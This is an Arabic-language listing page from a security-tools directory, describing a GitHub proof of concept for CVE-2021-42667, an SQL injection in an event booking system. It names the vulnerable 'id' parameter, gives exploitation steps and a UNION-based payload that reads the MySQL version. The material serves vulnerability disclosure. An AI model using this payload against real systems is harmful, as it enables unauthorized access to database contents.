Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/0xdeku/cve-2021-42667
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHub0xdeku/cve-2021-42667

CVE-2021-42667

CVE-2021-42667 - ثغرة حقن SQL في نظام حجز الأحداث والحجوزات عبر الإنترنت.

عرض المستودع
2منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-42667

CVE-2021-42667 - ثغرة حقن SQL في نظام الحجز والحجز عبر الإنترنت الإصدار 2.3.0.

الوصف التقني:

توجد ثغرة حقن SQL في برنامج إدارة الأحداث الإصدار 2.3.0. يمكن للمهاجم استغلال المعامل "id" القابل للتأثر في صفحة الويب "USER" من أجل التلاعب باستعلام SQL المنفذ. ونتيجة لذلك، يمكن للمهاجم استخراج بيانات حساسة من خادم الويب.

الصفحة القابلة للتأثر - USER

المعامل القابل للتأثر - "id"

خطوات الاستغلال:

  1. انتقل إلى http://localhost/event-management/views/?v=USER&ID=1
  2. أدخل حمولتك في المعامل id

إثبات المفهوم (Poc) -

الحمولة التالية ستتيح لك استخراج إصدار خادم MySQL قيد التشغيل على خادم الويب -

root@kitploit:~
UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL;-- -

CVE-2021-42667

المراجع -

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42667

https://nvd.nist.gov/vuln/detail/CVE-2021-42667

تم الاكتشاف بواسطة -

ألون ليفييف(0xDeku)، 22 أكتوبر 2021.

تنزيل الأداة